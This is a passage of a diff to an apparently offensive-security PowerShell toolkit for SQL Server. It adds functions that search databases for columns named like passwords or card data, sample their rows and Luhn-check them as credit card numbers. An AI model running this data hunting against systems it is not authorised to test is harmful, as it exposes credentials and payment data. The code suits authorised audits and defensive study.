[TRUNCATED] + PS C:\> Get-SQLColumn -Verbose -Instance "SQLServer1" .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLServerCredential -Verbose + PS C:\> Get-SQLInstanceLocal | Get-SQLColumn -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, @@ -4070,10 +5011,28 @@ Function Get-SQLServerCredential [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Credential name.')] - [string]$CredentialName, + HelpMessage = 'Database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Table name.')] + [string]$TableName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter by exact column name.')] + [string]$ColumnName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Column name using wildcards in search. Supports comma seperated list.')] + [string]$ColumnNameSearch, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't select tables from default databases.")] + [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -4082,21 +5041,66 @@ Function Get-SQLServerCredential Begin { - $TblCredentials = New-Object -TypeName System.Data.DataTable + # Table for output + $TblColumns = New-Object -TypeName System.Data.DataTable - # Setup CredentialName filter - if($CredentialName) + # Setup table filter + if($TableName) { - $CredentialNameFilter = " WHERE name like '$CredentialName'" + $TableNameFilter = " and t.TABLE_NAME like '%$TableName%'" } else { - $CredentialNameFilter = '' + $TableNameFilter = '' + } + + # Setup column filter + if($ColumnName) + { + $ColumnFilter = " and c.COLUMN_NAME like '$ColumnName'" + } + else + { + $ColumnFilter = '' + } + + # Setup column filter + if($ColumnNameSearch) + { + $ColumnSearchFilter = " and c.COLUMN_NAME like '%$ColumnNameSearch%'" + } + else + { + $ColumnSearchFilter = '' + } + + # Setup column search filter + if($ColumnNameSearch) + { + $Keywords = $ColumnNameSearch.split(',') + + [int]$i = $Keywords.Count + while ($i -gt 0) + { + $i = $i - 1 + $Keyword = $Keywords[$i] + + if($i -eq ($Keywords.Count -1)) + { + $ColumnSearchFilter = "and c.COLUMN_NAME like '%$Keyword%'" + } + else + { + $ColumnSearchFilter = $ColumnSearchFilter + " or c.COLUMN_NAME like '%$Keyword%'" + } + } } } Process { + # Note: Tables queried by this function typically require sysadmin or DBO privileges. + # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance @@ -4126,43 +5130,82 @@ Function Get-SQLServerCredential return } - # Define Query - $Query = " USE master; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - credential_id, - name as [CredentialName], - credential_identity, - create_date, - modify_date, - target_type, - target_id - FROM [master].[sys].[credentials] - $CredentialNameFilter" + # Setup NoDefault filter + if($NoDefaults) + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + } + else + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + } - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # Get tables for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName - # Append results - $TblCredentials = $TblCredentials + $TblResults + # Define Query + $Query = " USE $DbName; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + t.TABLE_CATALOG AS [DatabaseName], + t.TABLE_SCHEMA AS [SchemaName], + t.TABLE_NAME as [TableName], + CASE + WHEN (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) > 1 THEN 1 ELSE 0 END) = 1 THEN 'GlobalTempTable' + WHEN t.TABLE_NAME LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'LocalTempTable' + WHEN t.TABLE_NAME NOT LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'TableVariable' + ELSE t.TABLE_TYPE + END AS [TableType], + c.COLUMN_NAME as [ColumnName], + c.DATA_TYPE as [ColumnDataType], + c.CHARACTER_MAXIMUM_LENGTH as [ColumnMaxLength], + st.is_ms_shipped, + st.is_published, + st.is_schema_published, + st.create_date, + st.modify_date AS modified_date + FROM [$DbName].[INFORMATION_SCHEMA].[TABLES] t + JOIN sys.tables st ON t.TABLE_NAME = st.name AND t.TABLE_SCHEMA = OBJECT_SCHEMA_NAME(st.object_id) + JOIN sys.objects s ON st.object_id = s.object_id + LEFT JOIN sys.extended_properties ep ON s.object_id = ep.major_id + AND ep.minor_id = 0 + JOIN [$DbName].[INFORMATION_SCHEMA].[COLUMNS] c ON t.TABLE_NAME = c.TABLE_NAME AND t.TABLE_SCHEMA = c.TABLE_SCHEMA + WHERE 1=1 + $ColumnSearchFilter + $ColumnFilter + $TableNameFilter + ORDER BY t.TABLE_CATALOG, t.TABLE_SCHEMA, t.TABLE_NAME, c.ORDINAL_POSITION" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose + + # Append results + $TblColumns = $TblColumns + $TblResults + } } End { # Return data - $TblCredentials + $TblColumns } } -# ---------------------------------- -# Get-SQLServerLogin -# ---------------------------------- -Function Get-SQLServerLogin +# --------------------------------------- +# Get-SQLColumnSampleData +# --------------------------------------- +# Author: Scott Sutherland +Function Get-SQLColumnSampleData { <# .SYNOPSIS - Returns logins from target SQL Servers. + Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -4171,35 +5214,47 @@ Function Get-SQLServerLogin SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER PrincipalName - Pincipal name to filter for. + .PARAMETER $NoOutput + Don't output any sample data. + .PARAMETER SampleSize + Number of records to sample. + .PARAMETER Keywords + Number of records to sample. + .PARAMETER DatabaseName + Database to filter on. + .PARAMETER ValidateCC + Use Luhn formula to check if sample is a valid credit card. + Column name filter that support wildcards. + .PARAMETER NoDefaults + Don't show columns from default databases. .EXAMPLE - PS C:\> Get-SQLServerLogin -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 + PS C:\> Get-SQLColumnSampleData -verbose -Instance SQLServer1\STANDARDDEV2014 -Keywords "account,credit,card" -SampleSize 5 -ValidateCC| ft -AutoSize + VERBOSE: SQLServer1\STANDARDDEV2014 : START SEARCH DATA BY COLUMN + VERBOSE: SQLServer1\STANDARDDEV2014 : CONNECTION SUCCESS + VERBOSE: SQLServer1\STANDARDDEV2014 : - Searching for column names that match criteria... + VERBOSE: SQLServer1\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card] + VERBOSE: SQLServer1\STANDARDDEV2014 : - Selecting 5 rows of data sample from column [testdb].[dbo].[tracking].[card]. + VERBOSE: SQLServer1\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - PrincipalId : 1 - PrincipalName : sa - PrincipalSid : 1 - PrincipalType : SQL_LOGIN - CreateDate : 4/8/2003 9:10:35 AM - IsLocked : 0 + ComputerName Instance Database Schema Table Column Sample RowCount IsCC + ------------ -------- -------- ------ ----- ------ ------ -------- ---- + SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 4111111111111111 2 True + SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 41111111111ASDFD 2 False .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLServerLogin -Verbose + PS C:\> Get-SQLInstanceLocal | Get-SQLColumnSampleData -Keywords "account,credit,card" -SampleSize 5 -ValidateCC #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, @@ -4210,10 +5265,28 @@ Function Get-SQLServerLogin [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Principal name to filter for.')] - [string]$PrincipalName, + HelpMessage = "Don't output anything.")] + [switch]$NoOutput, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of records to sample.')] + [int]$SampleSize = 1, + + [Parameter(Mandatory = $false, + HelpMessage = 'Comma seperated list of keywords to search for.')] + [string]$Keywords = 'Password', + + [Parameter(Mandatory = $false, + HelpMessage = 'Database name to filter on.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Use Luhn formula to check if sample is a valid credit card.')] + [switch]$ValidateCC, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't select tables from default databases.")] + [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -4223,31 +5296,24 @@ Function Get-SQLServerLogin Begin { # Table for output - $TblLogins = New-Object -TypeName System.Data.DataTable - $null = $TblLogins.Columns.Add('ComputerName') - $null = $TblLogins.Columns.Add('Instance') - $null = $TblLogins.Columns.Add('PrincipalId') - $null = $TblLogins.Columns.Add('PrincipalName') - $null = $TblLogins.Columns.Add('PrincipalSid') - $null = $TblLogins.Columns.Add('PrincipalType') - $null = $TblLogins.Columns.Add('CreateDate') - $null = $TblLogins.Columns.Add('IsLocked') + $TblData = New-Object -TypeName System.Data.DataTable + $null = $TblData.Columns.Add('ComputerName') + $null = $TblData.Columns.Add('Instance') + $null = $TblData.Columns.Add('Database') + $null = $TblData.Columns.Add('Schema') + $null = $TblData.Columns.Add('Table') + $null = $TblData.Columns.Add('Column') + $null = $TblData.Columns.Add('Sample') + $null = $TblData.Columns.Add('RowCount') - # Setup CredentialName filter - if($PrincipalName) - { - $PrincipalNameFilter = " and name like '$PrincipalName'" - } - else + if($ValidateCC) { - $PrincipalNameFilter = '' + $null = $TblData.Columns.Add('IsCC') } } Process { - # Note: Tables queried by this function typically require sysadmin privileges. - # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance @@ -4257,86 +5323,125 @@ Function Get-SQLServerLogin $Instance = $env:COMPUTERNAME } - # Test connection to instance + # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } - if($TestConnection) + if(-not $TestConnection) { if( -not $SuppressVerbose) { - Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : CONNECTION FAILED" } + Return } else { if( -not $SuppressVerbose) { - Write-Verbose -Message "$Instance : Connection Failed." + Write-Verbose -Message "$Instance : START SEARCH DATA BY COLUMN" + Write-Verbose -Message "$Instance : - Connection Success." + Write-Verbose -Message "$Instance : - Searching for column names that match criteria..." } - return - } - # Define Query - $Query = " USE master; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance],principal_id as [PrincipalId], - name as [PrincipalName], - sid as [PrincipalSid], - type_desc as [PrincipalType], - create_date as [CreateDate], - LOGINPROPERTY ( name , 'IsLocked' ) as [IsLocked] - FROM [sys].[server_principals] - WHERE type = 'S' or type = 'U' or type = 'C' - $PrincipalNameFilter" + if($NoDefaults) + { + # Search for columns + $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -NoDefaults -SuppressVerbose + }else + { + $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -SuppressVerbose + } + } - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # Check if columns were found + if($Columns) + { + # List columns found + $Columns| + ForEach-Object -Process { + $sDatabaseName = $_.DatabaseName + $sSchemaName = $_.SchemaName + $sTableName = $_.TableName + $sColumnName = $_.ColumnName + $AffectedColumn = "[$sDatabaseName].[$sSchemaName].[$sTableName].[$sColumnName]" + $AffectedTable = "[$sDatabaseName].[$sSchemaName].[$sTableName]" + $Query = "USE $sDatabaseName; SELECT TOP $SampleSize [$sColumnName] FROM $AffectedTable WHERE [$sColumnName] is not null" + $QueryRowCount = "USE $sDatabaseName; SELECT count(CAST([$sColumnName] as VARCHAR(200))) as NumRows FROM $AffectedTable WHERE [$sColumnName] is not null" - # Update sid formatting for each record - $TblResults | - ForEach-Object -Process { - # Format principal sid - $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') - if ($NewSid.length -le 10) - { - $Sid = [Convert]::ToInt32($NewSid,16) + # Status user + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - Column match: $AffectedColumn" + Write-Verbose -Message "$Instance : - Selecting $SampleSize rows of data sample from column $AffectedColumn." + } + + # Get row count for column matches + $RowCount = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $QueryRowCount -SuppressVerbose | Select-Object -Property NumRows -ExpandProperty NumRows + + # Get sample data + Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose | + Select-Object -ExpandProperty $sColumnName | + ForEach-Object -Process { + if($ValidateCC) + { + # Check if value is CC + $Value = 0 + if([uint64]::TryParse($_,[ref]$Value)) + { + $LuhnCheck = Test-IsLuhnValid $_ -ErrorAction SilentlyContinue + } + else + { + $LuhnCheck = 'False' + } + + # Add record + $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount, $LuhnCheck) + } + else + { + # Add record + $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount) + } + } } - else + } + else + { + if( -not $SuppressVerbose) { - $Sid = $NewSid + Write-Verbose -Message "$Instance : - No columns were found that matched the search." } + } - # Add results to table - $null = $TblLogins.Rows.Add( - [string]$_.ComputerName, - [string]$_.Instance, - [string]$_.PrincipalId, - [string]$_.PrincipalName, - $Sid, - [string]$_.PrincipalType, - $_.CreateDate, - [string]$_.IsLocked) + # Status User + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : END SEARCH DATA BY COLUMN" } } End { # Return data - $TblLogins + if ( -not $NoOutput) + { + Return $TblData + } } } -# ---------------------------------- -# Get-SQLSession -# ---------------------------------- +# --------------------------------------- +# Get-SQLColumnSampleDataThreaded +# --------------------------------------- # Author: Scott Sutherland -Function Get-SQLSession +Function Get-SQLColumnSampleDataThreaded { <# .SYNOPSIS - Returns active sessions from target SQL Servers. Sysadmin privileges is required to view all sessions. + Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -4345,23 +5450,38 @@ Function Get-SQLSession SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .EXAMPLE - PS C:\> Get-SQLSession -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER $NoOutput + Don't output any sample data. + .PARAMETER SampleSize + Number of records to sample. + .PARAMETER Keywords + Comma seperated list of keywords to search for. + .PARAMETER DatabaseName + Database to filter on. + .PARAMETER NoDefaults + Don't show columns from default databases. + .PARAMETER ValidateCC + Use Luhn formula to check if sample is a valid credit card. - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - PrincipalSid : 010500000000000515000000F3864312345716CC636051C017100000 - PrincipalName : Domain\MyUser - OriginalPrincipalName : Domain\MyUser - SessionId : 51 - SessionStartTime : 06/24/2016 09:26:21 - SessionLoginTime : 06/24/2016 09:26:21 - SessionStatus : running + .PARAMETER Threads + Number of concurrent host threads. .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLSession -Verbose + PS C:\> Get-SQLColumnSampleDataThreaded -verbose -Instance SQLServer1\STANDARDDEV2014 -Keywords "account,credit,card" -SampleSize 5 -ValidateCC | ft -AutoSize + VERBOSE: SQLServer1\STANDARDDEV2014 : START SEARCH DATA BY COLUMN + VERBOSE: SQLServer1\STANDARDDEV2014 : CONNECTION SUCCESS + VERBOSE: SQLServer1\STANDARDDEV2014 : - Searching for column names that match criteria... + VERBOSE: SQLServer1\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card] + VERBOSE: SQLServer1\STANDARDDEV2014 : - Selecting 5 rows of data sample from column [testdb].[dbo].[tracking].[card]. + VERBOSE: SQLServer1\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN + + ComputerName Instance Database Schema Table Column Sample RowCount IsCC + ------------ -------- -------- ------ ----- ------ ------ -------- ---- + SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 4111111111111111 2 True + SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 41111111111ASDFD 2 False .EXAMPLE - PS C:\> (Get-SQLSession -Instance SQLServer1\STANDARDDEV2014).count - 48 + PS C:\> Get-SQLInstanceLocal | Get-SQLColumnSampleDataThreaded -Keywords "account,credit,card" -SampleSize 5 -ValidateCC -Threads 10 #> [CmdletBinding()] Param( @@ -4376,20 +5496,44 @@ Function Get-SQLSession [string]$Password, [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'PrincipalName.')] - [string]$PrincipalName, + HelpMessage = "Don't output anything.")] + [string]$NoOutput, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of records to sample.')] + [int]$SampleSize = 1, + + [Parameter(Mandatory = $false, + HelpMessage = 'Comma seperated list of keywords to search for.')] + [string]$Keywords = 'Password', + + [Parameter(Mandatory = $false, + HelpMessage = 'Database name to filter on.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't select tables from default databases.")] + [switch]$NoDefaults, + + [Parameter(Mandatory = $false, + HelpMessage = 'Use Luhn formula to check if sample is a valid credit card.')] + [switch]$ValidateCC, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of threads.')] + [int]$Threads = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -4399,124 +5543,180 @@ Function Get-SQLSession Begin { # Table for output - $TblSessions = New-Object -TypeName System.Data.DataTable - $null = $TblSessions.Columns.Add('ComputerName') - $null = $TblSessions.Columns.Add('Instance') - $null = $TblSessions.Columns.Add('PrincipalSid') - $null = $TblSessions.Columns.Add('PrincipalName') - $null = $TblSessions.Columns.Add('OriginalPrincipalName') - $null = $TblSessions.Columns.Add('SessionId') - $null = $TblSessions.Columns.Add('SessionStartTime') - $null = $TblSessions.Columns.Add('SessionLoginTime') - $null = $TblSessions.Columns.Add('SessionStatus') + $TblData = New-Object -TypeName System.Data.DataTable + $null = $TblData.Columns.Add('ComputerName') + $null = $TblData.Columns.Add('Instance') + $null = $TblData.Columns.Add('Database') + $null = $TblData.Columns.Add('Schema') + $null = $TblData.Columns.Add('Table') + $null = $TblData.Columns.Add('Column') + $null = $TblData.Columns.Add('Sample') + $null = $TblData.Columns.Add('RowCount') - # Setup PrincipalName filter - if($PrincipalName) - { - $PrincipalNameFilter = " and login_name like '$PrincipalName'" - } - else + if($ValidateCC) { - $PrincipalNameFilter = '' + $null = $TblData.Columns.Add('IsCC') } - } - - Process - { - # Note: Tables queried by this function typically require sysadmin privileges to view sessions that aren't yours. - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable - # Default connection to local default instance + # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - } - } - else + # Ensure provided instance is processed + if($Instance) { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance } - return } - # Define Query - $Query = " USE master; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - security_id as [PrincipalSid], - login_name as [PrincipalName], - original_login_name as [OriginalPrincipalName], - session_id as [SessionId], - last_request_start_time as [SessionStartTime], - login_time as [SessionLoginTime], - status as [SessionStatus] - FROM [sys].[dm_exec_sessions] - ORDER BY status - $PrincipalNameFilter" + # Add instance to instance list + $PipelineItems = $PipelineItems + $ProvideInstance + } - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + Process + { + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ + } - # Update sid formatting for each record - $TblResults | - ForEach-Object -Process { - # Format principal sid - $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') - if ($NewSid.length -le 10) + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + # Set instance + $Instance = $_.Instance + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) { - $Sid = [Convert]::ToInt32($NewSid,16) + $Instance = $env:COMPUTERNAME + } + + # Test connection to server + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if(-not $TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : CONNECTION FAILED" + } + Return } else { - $Sid = $NewSid + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : START SEARCH DATA BY COLUMN" + Write-Verbose -Message "$Instance : - Connection Success." + Write-Verbose -Message "$Instance : - Searching for column names that match criteria..." + } + + if($NoDefaults) + { + # Search for columns + $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -NoDefaults -SuppressVerbose + }else + { + $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -SuppressVerbose + } } - # Add results to table - $null = $TblSessions.Rows.Add( - [string]$_.ComputerName, - [string]$_.Instance, - $Sid, - [string]$_.PrincipalName, - [string]$_.OriginalPrincipalName, - [string]$_.SessionId, - [string]$_.SessionStartTime, - [string]$_.SessionLoginTime, - [string]$_.SessionStatus) + # Check if columns were found + if($Columns) + { + # List columns found + $Columns| + ForEach-Object -Process { + $sDatabaseName = $_.DatabaseName + $sSchemaName = $_.SchemaName + $sTableName = $_.TableName + $sColumnName = $_.ColumnName + $AffectedColumn = "[$sDatabaseName].[$sSchemaName].[$sTableName].[$sColumnName]" + $AffectedTable = "[$sDatabaseName].[$sSchemaName].[$sTableName]" + $Query = "USE $sDatabaseName; SELECT TOP $SampleSize [$sColumnName] FROM $AffectedTable WHERE [$sColumnName] is not null" + $QueryRowCount = "USE $sDatabaseName; SELECT count(CAST([$sColumnName] as VARCHAR(200))) as NumRows FROM $AffectedTable WHERE [$sColumnName] is not null" + + # Status user + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - Column match: $AffectedColumn" + Write-Verbose -Message "$Instance : - Selecting $SampleSize rows of data sample from column $AffectedColumn." + } + + # Get row count for column matches + $RowCount = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $QueryRowCount -SuppressVerbose | Select-Object -Property NumRows -ExpandProperty NumRows + + # Get sample data + Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose | + Select-Object -ExpandProperty $sColumnName | + ForEach-Object -Process { + if($ValidateCC) + { + # Check if value is CC + $Value = 0 + if([uint64]::TryParse($_,[ref]$Value)) + { + $LuhnCheck = Test-IsLuhnValid $_ -ErrorAction SilentlyContinue + } + else + { + $LuhnCheck = 'False' + } + + # Add record + $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount, $LuhnCheck) + } + else + { + # Add record + $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount) + } + } + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - No columns were found that matched the search." + } + } + + # Status User + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : END SEARCH DATA BY COLUMN" + } } - } - End - { - # Return data - $TblSessions + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblData } } # ---------------------------------- -# Get-SQLSysadminCheck +# Get-SQLDatabaseSchema # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLSysadminCheck +Function Get-SQLDatabaseSchema { <# .SYNOPSIS - Check if login is has sysadmin privilege on the target SQL Servers. + Returns schema information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -4525,14 +5725,26 @@ Function Get-SQLSysadminCheck SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER SchemaName + Schema name to filter for. + .PARAMETER NoDefaults + Only show information for non default databases. + .EXAMPLE - PS C:\> Get-SQLSysadminCheck -Instance SQLServer1\STANDARDDEV2014 + PS C:\> Get-SQLDatabaseSchema -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb - ComputerName Instance IsSysadmin - ------------ -------- ---------- - SQLServer1 SQLServer1\STANDARDDEV2014 Yes + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + SchemaName : db_accessadmin + SchemaOwner : db_accessadmin + [TRUNCATED] .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcure -Verbose -NoDefaults + PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseSchema -Verbose #> [CmdletBinding()] Param( @@ -4554,6 +5766,24 @@ Function Get-SQLSysadminCheck HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Schema name.')] + [string]$SchemaName, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't select schemas from default databases.")] + [switch]$NoDefaults, + + [Parameter(Mandatory = $false, + HelpMessage = "Show database role based schemas. Hidden by default.")] + [switch]$ShowRoleSchemas, + [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose @@ -4561,19 +5791,18 @@ Function Get-SQLSysadminCheck Begin { - # Data for output - $TblSysadminStatus = New-Object -TypeName System.Data.DataTable + # Table for output + $TblSchemas = New-Object -TypeName System.Data.DataTable - # Setup CredentialName filter - if($CredentialName) + # Setup schema filter + if($SchemaName) { - $CredentialNameFilter = " WHERE name like '$CredentialName'" + $SchemaNameFilter = " where s.name like '%$SchemaName%'" } else { - $CredentialNameFilter = '' + $SchemaNameFilter = '' } - } Process @@ -4607,38 +5836,76 @@ Function Get-SQLSysadminCheck return } - # Define Query - $Query = "SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - CASE - WHEN IS_SRVROLEMEMBER('sysadmin') = 0 THEN 'No' - ELSE 'Yes' - END as IsSysadmin" + # Setup NoDefault filter + if($NoDefaults) + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + } + else + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + } - # Execute Query - $TblSysadminStatusTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password 